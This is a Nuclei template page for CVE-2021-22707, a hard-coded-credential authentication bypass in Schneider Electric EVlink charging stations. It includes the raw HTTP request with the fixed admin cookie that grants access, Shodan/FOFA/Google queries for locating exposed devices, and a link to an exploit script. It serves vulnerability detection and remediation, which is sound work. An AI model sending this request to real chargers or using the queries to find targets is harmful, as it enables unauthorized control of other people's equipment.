Skip to content
Nuclei Templates

EVlink City < R8 V3.4.0.1 - Authentication Bypass

ID: CVE-2021-22707

Severity: critical

Author: ritikchaddha,dorkerdevil

Tags: cve2021,cve,evlink,auth-bypass,schneider-electric

Description

Section titled “Description”

A CWE-798: Use of Hard-coded Credentials vulnerability exists in EVlink City (EVC1S22P4 / EVC1S7P4 all versions prior to R8 V3.4.0.1), EVlink Parking (EVW2 / EVF2 / EV.2 all versions prior to R8 V3.4.0.1), and EVlink Smart Wallbox (EVB1A all versions prior to R8 V3.4.0.1 ) that could allow an attacker to issue unauthorized commands to the charging station web server with administrative privileges.

YAML Source

Section titled “YAML Source”
id: CVE-2021-22707


info:
  name: EVlink City < R8 V3.4.0.1 - Authentication Bypass
  author: ritikchaddha,dorkerdevil
  severity: critical
  description: |
    A CWE-798: Use of Hard-coded Credentials vulnerability exists in EVlink City (EVC1S22P4 / EVC1S7P4 all versions prior to R8 V3.4.0.1), EVlink Parking (EVW2 / EVF2 / EV.2 all versions prior to R8 V3.4.0.1), and EVlink Smart Wallbox (EVB1A all versions prior to R8 V3.4.0.1 ) that could allow an attacker to issue unauthorized commands to the charging station web server with administrative privileges.
  remediation: |
    Upgrade to EVlink City R8 V3.4.0.1 or later to fix the authentication bypass vulnerability.
  reference:
    - https://codeberg.org/AmenoCat/CVE-2021-22707-PoC/raw/branch/main/exploit.sh
    - https://nvd.nist.gov/vuln/detail/CVE-2021-22707
    - http://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2021-194-06
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-22707
    cwe-id: CWE-798
    epss-score: 0.39995
    epss-percentile: 0.97263
    cpe: cpe:2.3:o:schneider-electric:evlink_city_evc1s22p4_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: schneider-electric
    product: evlink_city_evc1s22p4_firmware
    shodan-query:
      - title:"EVSE web interface"
      - http.title:"evse web interface"
    fofa-query:
      - title="EVSE web interface"
      - title="evse web interface"
    google-query: intitle:"evse web interface"
  tags: cve2021,cve,evlink,auth-bypass,schneider-electric


http:
  - raw:
      - |
        GET /cgi-bin/cgiServer?worker=IndexNew HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Cookie: CURLTOKEN=b35fcdc1ea1221e6dd126e172a0131c5a; SESSIONID=admin


    host-redirects: true
    max-redirects: 2


    matchers-condition: and
    matchers:
      - type: word
        words:
          - '?worker=Cluster" name="cluster" id="id_cluster'


      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f41796ac38d2548960fb3a75a6bcaf4ac27fee79e06b68d3e0323e6ffdcd54db022100f0382bed446a1a7137c349841814fc0caed7a77d5b26f0d982ef9676e3d74406:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-22707.yaml"

View on Github